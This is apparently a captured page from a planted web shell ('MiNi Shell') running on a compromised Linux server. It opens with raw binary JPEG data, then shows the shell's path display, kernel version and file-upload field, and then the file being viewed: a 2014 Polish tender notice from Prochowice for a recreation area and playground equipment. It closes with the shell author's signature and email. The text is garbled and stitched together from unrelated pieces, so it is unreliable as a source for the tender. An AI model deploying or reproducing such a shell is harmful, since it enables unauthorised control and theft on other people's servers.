JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20140829/185487-N-2014.html

<p class="kh_header"><b>Prochowice: Budowa placu rekreacyjnego przy ul. Karola Miarki w Prochowicach oraz doposażenie infrastruktury turystyczno-rekreacyjnej w Kwiatkowicach i Kawicach</b><br>
<b>Numer ogłoszenia: 185487 - 2014; data zamieszczenia: 29.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Prochowice , ul. Rynek 1, 59-230 Prochowice, woj. dolnośląskie, tel. 076 8584342 lub 8584343, faks 076 8584581.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.prochowice.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa placu rekreacyjnego przy ul. Karola Miarki w Prochowicach oraz doposażenie infrastruktury turystyczno-rekreacyjnej w Kwiatkowicach i Kawicach.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest budowa miejsca rekreacyjnego przy ul. Karola Miarki w Prochowicach oraz dostawa i montaż urządzeń rekreacyjnych dla dzieci i młodzieży oraz osób starszych w trzech miejscowościach: Prochowice, Kwiatkowice, Kawice. Zamówienie składa się z elementów: 1. Budowa miejsca wypoczynkowo-rekreacyjnego przy ul. Karola Miarki w Prochowicach - zamówienie realizowane w ramach operacji pn. Rewitalizacja zieleni miejskiej oraz promocja walorów przyrodniczych Krainy Łęgów Odrzańskich na miejskim odcinku Szlaku Odry w centrum Prochowic zadanie współfinansowane środkami Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie małych projektów. Miejsce realizacji zamówienia Prochowice obręb nr 3 działka nr 50 zgodnie z projektem budowlanym pn. Zagospodarowanie działki na cele wypoczynkowo-rekreacyjne, oraz projektem zieleni, przedmiarem robót - załącznik nr 1 do SIWZ. Zamówienie obejmuje wykonanie: - wykonanie ogrodzenia systemowego o długości ok. 109m z paneli stalowych ocynkowanych i powlekanych PCV (ok. wys. 1320mm, szer. 2500mm) górna krawędź zamknięta ceownikiem w kształcie łuku. Panele osadzone w gruncie na słupkach z rur kwadratowych o przekroju 40x60 1,5mm. W ogrodzeniu zamontować furtkę systemową o wymiarach 1470x1000mm z kształtowników stalowych ocynkowanych powlekanych PCV na słupkach z rur kwadratowych 80x80x2mm oraz bramę systemową  o wymiarach 1470x3000mm dwuskrzydłową. Ogrodzenie systemowe z wykorzystaniem elementów producenta tj. obejmy, kapturków itp. - wykonanie cokołu żelbetowego o długości ok. 109m z żelbetowych prefabrykowanych elementów o długości ok. 256cm i wysokości 200mm. W części północnej placu wykonać mur oporowy o długości 17,6, z betonu B-25 o przekroju ok. 0,2x0,3m. - wykonanie nawierzchni placu: nawierzchnia piaskowa pow. 115m2 o frakcji 0,2-2mm głębokości ok. 30cm, nawierzchnia z kostki betonowej gr. 6cm - 27m2 oraz nawierzchnia trawiasta o pow. ok. 537m2. - wykonanie nasadzeń roślinności rodzimych, wieloletnich o dużych walorach dekoracyjnych, pnączy tj. Bluszcz pospolity (Hedera helix 20-25cm, C3) 50szt, Winobluszcz Pięciolistkowy (60-100, C3) 30szt, Trzmielina Fortunea (20 -, C3) 200szt. Nasadzenia drzew i krzewów - typu Buki, Klony Lipy - 5szt. Krzewy typu Kalina koralowa 3szt., Berberys Thunberga 3szt., Ognik szkarłatny 3szt., Perukowiec podolski 3szt. - nazwy łacińskie oraz szczegółowe wymiary i wymagania materiału szkółkarskiego zawiera załącznik nr 1 do SIWZ. 2. Rozbudowa infrastruktury turystyczno-rekreacyjnej w trzech miejscowościach Kwiatkowicach, Kawicach i Prochowicach - zamówienie obejmuje dostawę i montaż urządzeń rekreacyjnych oraz turystycznych w ramach operacji pn. Turystyczne Łęgi Odrzańskie - rozbudowa infrastruktury turystyczno-rekreacyjnej Szlaku Odry w Gminie Prochowice zadanie współfinansowane środkami Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 413 Wdrażanie lokalnych strategii rozwoju - dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi: - Rozbudowa infrastruktury turystycznej na Szlaku Odry w Kwiatkowicach: zamówienie obejmuje dostawę i montaż urządzeń infrastruktury turystycznej w Kwiatkowicach działkach nr 231, 232  zgodnie z projektem budowlanym pn. Zagospodarowanie terenu w ramach zadania: Rozbudowa przystanku turystycznego na Szlaku Odry w Kwiatkowicach - załącznik nr 1 do SIWZ. Zamówienie obejmuje dostawę i montaż: - Stojak na rowery 5 stanowiskowy osadzony w gruncie na stałe. Stojak wykonany z elementów metalowych - stali węglowej konstrukcyjnej zabezpieczonej przed korozją ocynkiem ogniowym i malowany proszkowo w kolorze nawiązującym do pozostałych elementów placu zabaw - 1 szt. - Ławka bez oparcia z siedziskiem wykonanym z drewnianych krawędziaków długości min. 150cm, konstrukcja stalowa ocynkowana malowana proszkowo osadzona na stałe w gruncie - 4 szt. - Dostawa i montaż urządzeń siłowni plenerowej typu: biegacz i orbitek, wyciąg górny i wyciskanie siedząc na pylonie (pylon z instrukcja obsługi urządzeń siłowni). Urządzenia z konstrukcji nośnej wykonanej ze stalowych rur o przekroju 90 mm i grubości 3,6mm. Uchwyty i pozostałe elementy rurowe wykonane ze stalowych rur 40 mm, grubość 2mm. Rury zakończone plastikowymi zatyczkami. Siedziska, i pedały wykonane ze stalowej blachy grubości 2 mm z otworami. Siedziska, pedały i oparcia mają być wykonane ze stali kwasoodpornej (nierdzewnej). - Budowa infrastruktury turystyczno-rekreacyjnej na Szlaku Odry w Kawicach: zamówienie obejmuje dostawę i montaż urządzeń infrastruktury turystycznej w Kawicach działka nr 391  zgodnie z projektem budowlanym pn. Zagospodarowanie działki w ramach zadania: Budowa infrastruktury turystyczno-rekreacyjnej Szlaku Odry w Kawicach - załącznik nr 1 do SIWZ. Zamówienie obejmuje dostawę i montaż: - Stojak na rowery 5 stanowiskowy osadzony w gruncie na stałe. Stojak wykonany z elementów metalowych - stali węglowej konstrukcyjnej zabezpieczonej przed korozją ocynkiem ogniowym i malowany proszkowo w kolorze nawiązującym do pozostałych elementów placu zabaw - 1 szt. - Kosz na śmieci przy każdej ławce osadzony w gruncie kosz typu KM-3 o pojemności 45l wykonany z blachy ocynkowanej malowanej proszkowo. Słupki metalowe malowane farbami proszkowymi osadzone w gruncie - 1 szt. - Rozbudowa infrastruktury turystyczno-rekreacyjnej na Szlaku Odry w Prochowicach: zamówienie obejmuje dostawę i montaż urządzeń zabawowych placu wypoczynkowo-rekreacyjnego w Prochowicach przy ul. Karola Miarki (obręb nr 3 miasta Prochowice działka nr 50)  zgodnie z projektem budowlanym pn. Zagospodarowanie działki na cele wypoczynkowo-rekreacyjne - załącznik nr 1 do SIWZ. Zamówienie obejmuje dostawę i montaż: - Stojak na rowery 5 stanowiskowy osadzony w gruncie na stałe. Stojak wykonany z elementów metalowych - stali węglowej konstrukcyjnej zabezpieczonej przed korozją ocynkiem ogniowym i malowany proszkowo w kolorze nawiązującym do pozostałych elementów placu zabaw - 1 szt. - Ławka bez oparcia z siedziskiem wykonanym z drewnianych krawędziaków długości min. 150cm, konstrukcja stalowa ocynkowana malowana proszkowo osadzona na stałe w gruncie - 2 szt.
- Kosz na śmieci przy każdej ławce osadzony w gruncie kosz typu KM-3 o pojemności 45l wykonany z blachy ocynkowanej malowanej proszkowo. Słupki metalowe malowane farbami proszkowymi osadzone w gruncie - 2 szt. - Dostawa i montaż urządzeń siłowni plenerowej typu: orbitek, wyciskanie siedząc na pylonie (pylon z instrukcja obsługi urządzeń siłowni). Urządzenia z konstrukcji nośnej wykonanej ze stalowych rur o przekroju 90 mm i grubości 3,6mm. Uchwyty i pozostałe elementy rurowe wykonane ze stalowych rur 40 mm, grubość 2mm. Rury zakończone plastikowymi zatyczkami. Siedziska, i pedały wykonane ze stalowej blachy grubości 2 mm z otworami. Siedziska, pedały i oparcia mają być wykonane ze stali kwasoodpornej (nierdzewnej). - Dostawa i montaż karuzeli: karuzela tarczowa średnicy 150cm z czterema siedziskami tracza wykonana z blachy typu łezka obwiedzionej rurką 30 mm, konstrukcja metalowa, ocynkowana, malowana proszkowo, siedziska ze sklejki HDPE obwiedzione rurką grubości 30mm - 1 kpl. - Dostawa i montaż zestawu Forteca zamek: zestaw składa się z elementów: 3 Wieże trójkątne, 2 Wieże czworokątne, 2 Dachy dwuspadowe Z, 1 Równoważnia Z, 1 Pomost z osłonami Z, 1 Łuk podestowo-linowy z osłonami Z, 1 Pomost wiszący Z, 1 Wejście wspinaczkowe Z, 1 Drabinka W3, 1 Wejście linowe Z, 1 Zjeżdżalnia smok, 1 Ścianka stalowa kratownica, 1 Ścianka linowa pajęczyna, 1 Komin linowy Z, 25 Okuć metalowych w grunt. Liny z rdzeniem stalowym w oplocie z polipropylenu, łączone za pomocą aluminiowych łączników. Drewno klejone warstwowo, impregnowane malowaniem powierzchniowym nietoksycznymi środkami ochronnymi. Belki konstrukcyjne osłonięte kapturkami z tworzywa sztucznego. Elementy stalowe, takie jak szczeble, uchwyty, wykonane są ze stali konstrukcyjnej węglowej ocynkowanej galwanicznie i malowanej proszkowo, zjeżdżalnia wykonana ze stali nierdzewnej. 3. Informacje dodatkowe: - Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr 1 do SIWZ Dokumentacja budowlana. - Wszystkie nakłady do wykonania całości zamówienia: robocizna, materiały i sprzęt leżą po stronie wykonawcy i ich wartość należy uwzględnić w cenie ofertowej, która w niniejszym postępowaniu ma charakter wynagrodzenia ryczałtowego. - Wykazane wyroby gotowe, urządzenia i materiały, z podaniem nazwy i symbolu producenta, danych technicznych i opisów technologii, przeznaczone do wbudowania przeznaczonych w ramach prac wykonawczych, stanowią przykłady elementów, urządzeń i materiałów, jakie mogą być użyte przez wykonawców w ramach robót. Znaki firmowe producentów oraz nazwy i symbole wyrobów zostały podane jedynie w celu jak najdokładniejszego określenia ich charakterystyki. Dopuszcza się zastosowanie rozwiązań równoważnych tzn. takimi, które nie będą gorsze jakościowo od wskazanych przez projektanta, zagwarantują uzyskanie tych samych lub lepszych parametrów technicznych oraz będą posiadać niezbędne atesty i dopuszczenia do stosowania..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.20.00.00-9, 77.31.00.00-6, 37.53.52.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 50.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium wartości: 2800,00PLN słownie: dwa tysiące osiemset.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia wykonawcy - formularz D.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zdolny do należytego wykonania zamówienia to taki Wykonawca, który wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert,           a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał: min. 3 zamówienia na kompleksowe wykonanie zagospodarowania terenów rekreacyjnych, placów zabaw o pow. min. 670m2 każdy z montażem urządzeń zabawowych i rekreacyjnych, wykonaniem  zieleni (nasadzeniem drzew i krzewów) wraz z określeniem, czy roboty i dostawy zostały wykonane w sposób należyty oraz wskazujących, czy zostały prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania warunków w tym zakresie na podstawie oświadczenia wykonawcy - formularz D</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wypełniony formularz ofertowy - wg formularza A;
b) kosztorys ofertowy, sporządzony w sposób określony w rozdz. XI SIWZ. 
c) dokumenty potwierdzający umocowanie osoby podpisujących ofertę np. aktualny odpis z właściwego rejestru, wydruk z CEIDG.
d) pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy - jeżeli uprawnienia osoby podpisującej ofertę nie wynikają z dokumentu, o którym mowa w pkt. 4 c);
e) dowód wniesienia wadium</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający informuje, że przewiduje możliwość dokonywania istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, w zakresie i na warunkach określonych w § 11 ust.4 i 5 projektu umowy, stanowiącego załącznik nr 2 do SIWZ tj: 
4. Dopuszcza się możliwość zmiany terminu końcowego wykonania zamówienia, określonego w § 3 ust.2 umowy, w sytuacji wyjątkowej, będącej następstwem zaistnienia takich okoliczności jak:  
1) siła wyższa lub szczególnie niekorzystne warunki atmosferyczne;
2) odkrycia, znaleziska, wykopaliska; uniemożliwiające dotrzymanie  terminu umownego. 
3) wystąpienie robót dodatkowych, nieobjętych zamówieniem podstawowym, niezbędnych do jego prawidłowego wykonania, których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia;
4) wady w dokumentacji, wymagające dodatkowego czasu na ich usunięcie
5. Dopuszcza się możliwość zmiany kwoty wynagrodzenia umownego, określonego w § 5 ust.1 w następujących przypadkach: 
1) ustawowa zmiana stawki podatku VAT na dostawy objęte niniejszą umową,
2) stwierdzenie przy odbiorze wad nie nadających się do usunięcia, gdy nie uniemożliwiają one użytkowania przedmiotu odbioru zgodnie z przeznaczeniem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.prochowice.com/content.php?cms_id=38||menu=p7<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Prochowice, 
59-230 Prochowice, ul. Rynek 1, pokój nr 12.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.09.2014 godzina 09:00, miejsce: Urząd Miasta i Gminy Prochowice, 
59-230 Prochowice, ul. Rynek 1, sala 20 (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane środkami Programu Rozwoju Obszarów Wiejskich na lata 2007-2013 w ramach działania 413 Wdrażanie lokalnych strategii rozwoju w zakresie małych projektów oraz Wdrażanie lokalnych strategii rozwoju dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com